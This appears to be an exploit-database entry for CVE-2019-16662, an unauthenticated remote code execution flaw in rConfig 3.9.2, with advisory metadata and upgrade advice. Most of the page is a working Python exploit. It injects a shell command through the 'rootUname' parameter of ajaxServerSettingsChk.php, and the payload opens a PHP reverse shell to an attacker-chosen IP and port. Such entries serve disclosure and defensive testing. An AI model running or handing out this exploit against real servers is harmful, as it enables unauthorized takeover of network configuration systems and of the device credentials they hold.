rConfig 3.9.2 - Remote Code Execution

vendor:

rConfig

by:

Askar

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: rConfig

Affected Version From: 3.9.2

Affected Version To: 3.9.2

Patch Exists: YES

Related CWE: CVE-2019-16662

CPE: a:rconfig:rconfig

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: CentOS 7.7 / PHP 7.2.22

2019

rConfig 3.9.2 – Remote Code Execution

rConfig is a web-based network device configuration management application. A vulnerability in rConfig 3.9.2 allows an unauthenticated attacker to execute arbitrary code on the target system. This is due to the lack of input validation in the 'rootUname' parameter of the 'ajaxServerSettingsChk.php' script, which is accessible through the '/install/lib/ajaxHandlers/' directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable server. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.

Mitigation:

Upgrade to rConfig version 3.9.3 or later.

Source

Exploit-DB raw data:

# Exploit Title: rConfig 3.9.2 - Remote Code Execution
# Date: 2019-09-18
# Exploit Author: Askar
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
# CVE : CVE-2019-16662

#!/usr/bin/python

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)


rConfig-preauth.png